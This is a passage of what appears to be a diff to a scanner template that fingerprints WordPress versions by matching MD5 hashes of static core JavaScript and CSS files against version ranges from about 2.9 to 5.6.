"(\"53d806ed3ac6a8a1d318f4b30e6710a5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"491a7743fca230e82b84982a8ff59418\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"696de30f3cf4547a2aaa8fe0e952b6d1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"310df817c0cfdfd6fd874c0f8d815714\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"11a79ea66a6057723dcb30218375f194\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"baee98ea647db53f68e17624fe74142b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"3fd4dd5652ec927a08af04d6ee78b931\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"9f99120370b704e6c7d40f9a5705e823\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"1969be970d4928a749df77e59b27c788\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"2abe93f2d7a83cf5707e9d09c8666de7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"348d0fec979d6f8669f9e771d870b820\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"3b1646e8a61a8a2e8001c3d9cc85883b\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.2.9 + dsl: + - "(\"aefff2962b2f3da789019ca890e97f83\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"fcac029c576eba52ee643630959205b8\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"3400ae02caacb104f1ee4c26adfa86bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-models.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"e715ea6806c9fdb94aa4d56812dd0217\" == md5(body))" + - type: dsl + name: 3.9.1 - 4.5.23 + dsl: + - "(\"4f4b04852e86713b9f7490e74ee8820a\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"aa94f4d4ff1df18548142ad13d427ca5\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - 
"(\"1f1c22726066146cbe889da7288dd45b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"bba23cbc9478a251a816c14aa4074ec0\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"c2fc10cb436eb00cdaf8b1ef9a6189f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mce-view.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"33ee9226013e0103d805385f03ebd1eb\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"27da44a32d58d85456db41abc06bedd6\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"602fc8936631c7079b786cbbac621dd8\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.5 + dsl: + - "(\"8e41e6dfd2bc21ec39bd995451083e3b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"26a64b5857f1fa98167856ac39b0a268\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"fae23eefe8da67b53ebae7fe69c5a3d8\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"8f1af3af83b1bc0ef7aecef9e5cc321d\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.9 + dsl: + - "(\"9ee110328baeee9a859f687924ec188a\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.5.23 + dsl: + - "(\"0a1ee06ff6afbc7e8fa3aa042a88a9f2\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"42c639526ec5b00732f0fb2e7b0d6a53\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"ed623af79c9fa06e85b845ee9421a111\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.15 + dsl: + - "(\"e3a253b2b4de734d3a11a3934be5dd65\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"924fa693f18b70b70c3f76ad13142bb2\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"81adc1a2adc7b15f6b5d5f151c880af3\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"cb3deca0110cd39ea85a9a3b65d3162f\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"399743416c751e4d8b55d0398b69a675\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - 
"(\"274729193f8ab542fd1979bba987db49\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"294d02cbc00b2310c0d5cf11c55a2ba0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"332d2f8f3ee47dde343517e278928c52\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"140e4a74c6be70800fcef20fce9ae444\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.33 + dsl: + - "(\"40092f2fbf830be89b8c4db99c9008b0\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"5c9bdc4d0fc3392189943f92ba6866d7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"f61e2fe8bcc3e3a8f0d4b60db44e01a4\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.2.9 + dsl: + - "(\"280263cbe063651d578398c8d4046cc8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5a54019a3f7e48c4249361115f8e41ec\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"877eec8c4cabdf1e49a86a93d77dc9c7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.8.35 + dsl: + - "(\"f62250845c0562ef7cccb70d6522c468\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/editor.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"df77ac2726ff3184ff4a1e98ff5b2b7b\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"d23fdbfc8b0862fb2f292802ccb8a60d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"0ba8d7fa20e86f60b06176c72130bc4d\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"5a0be8ac9af0e5b7b226614028b43e98\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6e13c98d1b89242683a6a1f0ffe3466e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"0f147f511b5b2fc8655ab54e06d0cc67\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"703c7f914fa4199de132f72d5b753f80\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a71c41c4b1c1f15084fe96f5f6d5e095\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"7af92b8e79eb872268168985e58f929b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a2c51851e5047cc75a589776eb121e3c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"18350be6b3460d492e38b872b98096b7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"4108ed5fd8a75d5f27078e93ea36a5a1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"5d34ed8fe7919c5f5033866fcecdbe9a\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"b31212dac1e1d3e209ae744e60feec97\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"183b9588a66b858c3d0d3400bc656a49\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"b5d03f70f0d0cb3ab958a14fa05d429e\" == md5(body))" + - type: dsl + name: 4.9.2 + dsl: + - "(\"afb2c16bfc582737cabffd2957caf7aa\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"72b7a034ba598088d699dca7b02b6f0b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"066c2527266f538d9d4acad0cbad13b7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9d022867c4e76a4d14c4c8b12b0765b9\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"4bbcdba80298c38da1020c92bead6dd3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.css" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"514952b81c6dbef19b62b040e76484f9\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"aa094951adcb751c299c0bd6b88468a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"085c8450a198ee8d1e655b4864056777\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"f6c1fb0448444810959c4c9b94ef2cb0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2cb3162100ec30ee6d02f9b833de3b96\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9f16dff935c6b68c4d43ee641795a4a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - 
"(\"36571e36be8cce5ed3cce6974430b474\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"d532290da96647a06230087dcfce2cee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.js" + matchers: + - type: dsl + name: 4.3 - 4.9.4 + dsl: + - "(\"7a0e1bfc429252530cfb8318f53a5986\" == md5(body))" + - type: dsl + name: 3.7 - 4.2.29 + dsl: + - "(\"55a6b7fb4b1b287497d3fc30910e97ce\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"20f4d36a0d371e99909c5888b5903dcc\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"1c8df6748c944b8bbbdc81b4774c590c\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4295587170c3f16d76082f79ad9ff8e9\" == md5(body))" + - type: dsl + name: 2.9 - 3.0.6 + dsl: + - "(\"eb1bcd7d2f86645bb7265803ff189c95\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.3.6 + dsl: + - "(\"63ec4a65e41151dfd5c85e88fc98a42c\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"58434a61140e1f5ffc4d8fdefbd8c185\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.js" + matchers: + - type: dsl + name: 4.5 - 4.9.2 + dsl: + - "(\"aaf77f7481f419f5f8c46ae338820443\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"0ec99859384076f01ce50727d9bf18b3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"49c9650815be34444bf6f171eaf9c7c2\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"bbb0981d3bb6131a999a42a42dcce185\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"b135057e7d04c299ca1e9b7d6055f4ed\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"92f80679cff32ca6b23ba0137731b5fb\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - 
"(\"ab1f84089f871d9658886c22a46ff080\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.js" + matchers: + - type: dsl + name: 4.8.2 - 5.0.2 + dsl: + - "(\"6563181820c6b50a36ab7249198bdfea\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"fb20e3b0720c69a5bc3c6afff8e9db29\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"fd437907913d9ff37c7b68191f011363\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.5 + dsl: + - "(\"f955840763cec05064af68c3505fc98a\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"d1ca5593704c028cafa1e8bbd15f1b99\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"57ea74a73e7645136c0a9cc5abbd540a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"02348d98fc99d773c62a13fbcae96d68\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.9 + dsl: + - "(\"a7e67b7e7f5c322959dc66b35f1eda5b\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"9914791ca8d1c20816f66b3ee6a3c575\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"3449cc137556743fcfa8270a1480c1e2\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"8c308b4742cb277f10492615392c7c7a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"bb9a4f6e9e3f4f0578a8216e47621127\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"72f75b21018ea87dde7985ac76412713\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.15 + dsl: + - "(\"5c88246db88479ae6c91651d19eaedea\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"624e27eeb0275c0d0856e22e23456e13\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"5e6da10bd91d3bc1efdb71c105f8293c\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"134e15484be933063a7b5e72c201fd88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"cb46666ddb54cb5220c58c529b72b068\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - 
"(\"26500607f021bfaa5b1462e48c0ee7e5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.19 + dsl: + - "(\"6641471b76e06bb7ca734cc620549d59\" == md5(body))" + - type: dsl + name: 3.9.20 - 3.9.33 + dsl: + - "(\"7d8dcae6fc67866464349fe714829901\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.21 + dsl: + - "(\"0d245718982f036887e169f79ceaba88\" == md5(body))" + - type: dsl + name: 3.8.22 - 3.8.35 + dsl: + - "(\"ffc517a6eb9a057222e152f58a9bf098\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.21 + dsl: + - "(\"3e14409d11ab45bb0f2c90e60978384f\" == md5(body))" + - type: dsl + name: 3.7.22 - 3.7.35 + dsl: + - "(\"f8a7e3f7491e199375f554e43e90f3e1\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"898be13a9020c5f02e3c35f94b173557\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"628548fcce211ffe2df025d71d5d1001\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c1b068acfed8ce07852470f45b777a43\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"a8f124022bc4799e62c8b58f7db6989d\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"ad293791760966322c4dda8bc3329848\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"ccf54fa65c9b33ce8d2069bd8e3fa0c4\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"552e613b678cb04a27dab9122e721ea1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/postbox.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"ddfe27f4efae737b800bad96ed8a0969\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5bdffa0bca3aa2a832ebae263bb7f8cb\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"16f96070d454f607633aa9234c71fdd5\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"f07216a42e8487aea5738f6d71b5c7d3\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"8bf00b23dafb248f022d8b21693e0418\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - 
"(\"1c663bd092f4cdf5f18344d493f3e20b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"622b17ff667f50e0ed37db8993407e73\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"084dc85c20f5d1eb23a25441eaf714c7\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1a7ea068ca15d7249279dfba54ff87ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"6219e9663ede786bff44bbf756b37c76\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"117e10b1b305c87fcdcd57b122188e55\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fdc229b9e4beb2e87db12206402e4668\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"21c0429ec7415594fb008adc844d312d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3b99d039afbb7196baa78450c0a345e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"b2e733f0c117e30ac8974dcc69ab11d8\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"5bd4dfd347e0592a6bc8a5b9d6b070fc\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"78e3a64f61738d7bf52d7627e6260c23\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"0f3dc51f78d4b14bda30cb12cf062a7c\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"974be2549060c521272558a85b1ce3e1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"725d72af8994225dc221211cd8120e8e\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"5f7b0e488ff4124ec5c4636186c2aaae\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"9c6442635f5e064bdb407b9f9cf0c8f4\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"3cd6f647119b7e18f59945d397c30c3f\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c6ddf28ff950f8a3169a771f16b54b34\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - 
"(\"990a02987267bae995291b115857b5af\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bb4c98a582dc6fccad187447328ca65a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f7d5140804d46ebae1b075dc92bc17a0\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e3755ebeee513e368100f6764ff86863\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"50133084c104b9bd63224ef52111c1e4\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"ddaab5f3a810428b4584c77ebcf5c3df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"34a4f9f830f96bbedd820af0e6d8eec5\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"c3a2c4a3828c0be8b3492aeaa66c5a70\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.scss" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"98a7912681f8eed611164ea4bbba4a66\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"8aa858ffccaf9bc552d66ad90846f29c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.min.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"b065fcf45b87cf191ba9ce41c99fa971\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"377da0d0eefd24ce110066de3ddd6baf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/modern/colors.min.css" + matchers: + - type: dsl + name: 5.5 + dsl: + - "(\"bf9e3629961d4c7aaf4f6f4c84ba1d84\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.6 + dsl: + - "(\"1aab7203b65801018a6f8ea5c0a91f44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"9be63adbaf5a5acfdbfdd555dc19777d\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + 
dsl: + - "(\"2e8efd83242126157ff0bffd5e249159\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.1.32 + dsl: + - "(\"9f8b1a50cba5f06427ffe004043128c9\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"1c1a6cef0123a419a9fb9595c199fe78\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3cc25c8aa2e2d4c4a164691cd70ddf73\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"fdac3c9c1567fea9f5f1fc1a2f29517e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"7f667bc10fca561ca610d12be057d75f\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"ffccf4fd05e4c7b3bc1e9ef33c378ae1\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"7fe26c4e0d3b4b83cbc359066bb7bb37\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"149fa83dc3c3baaea6891e4ec34b6ad8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ae4f49117ed3eee9825a55bf439b49b8\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"45c47322e851a00e440a6e2d26174dcb\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"5ee094206a409c7b1f0e7ad0883b677a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"dc89e6f924d1bea954cbadebbf88a08f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/edit-comments.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"de6d5d8283b0fb6a34f5c99569f910ef\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"a219a0b276225bb3bacac8c2cb3776b4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3c16bfa9df88e42ccd3756bec32fe937\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"1e6e025c21f675863bc8afbd6b713386\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d23d7a162d5b1427fe16b04689041981\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"f56147d75a8ff4d0a9a62f88a5203d9a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"f303c21d68b4ebff99aab2df75f81db9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"e1d64d4023fe0facd55ee1600b50a15f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5cf4c4c0250888b7b97e1536f82bea01\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7480780b3eca41e4e7e4a3fe6c63d43e\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"93ce03b7394bab13fc1bb343d87f00d2\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"97312b01a5aa72fef38a41da963abb49\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"0405cc7848d59145b6953e7fd9b1c419\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b78b87670b43888624a5600101dc32c3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f51e509e450fe740e3295f175071b240\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"702d78113dd95f8b0bb2df8cb3192a3a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3387b2ca93f4eff740390930774cd4d2\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"039e69bcf2d3f162058b581e6430d0c9\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"e57cfccfba6062793096ebad5b2ed81c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3fb79dd105267303559830d7a93ae645\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/autosave.min.js" + matchers: + - type: dsl + name: 4.7 - 5.2.9 + dsl: + - "(\"c2366b7de7027d09661ecdde0c8d1025\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0ad41a39a5590a02c5689f379b97afad\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.5.23 + dsl: + - "(\"9f6cbf92fd682f09be0c265804c9ab67\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"5e1ea0845232846c1907d9fe70864d23\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"2eec8f2c408c881c6715ce0f682f3707\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - 
"(\"e4a56f032409c33f96d20ecfaed223e6\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b5f51dcf394c4611b05725837d18dc2b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"ca350f05d29aefd91692725945c944fa\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"d170f66997bf4dd0a595354633129133\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"7f88619a2907adba7943d1f3ff47b63b\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"0a5377f0fedb60c22a9d918cfd4e91ac\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1ea6e59d88f83106e2ae3aff299d35df\" == md5(body))" + - type: dsl + name: 5.4 - 5.6 + dsl: + - "(\"aed85e244029fd1915a00f757c1a83ea\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"5ea21828b317f9b2ed50a6eef99afc46\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"0c1c912e31c1c4523af949b0a10608e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wplink.min.js" + matchers: + - type: dsl + name: 4.8.2 - 5.0.2 + dsl: + - "(\"5c8ce7c9fc66234e60742bf8d3cf2ffb\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"06ddc3571523ab44448ba3566ea9e2d8\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"cff6fcc5b70652ee476588bc20884511\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.5 + dsl: + - "(\"59b4b46ffe146371aae9fcc50c7e1930\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"18f38030b7acd35250c60fe80ab73699\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"a3119f33e453860200fbacb09474f51e\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"951dc23f64588e89e7dd9c13661a473d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.9 + dsl: + - "(\"219a7c4fdeec0aef6655934410a5a587\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - 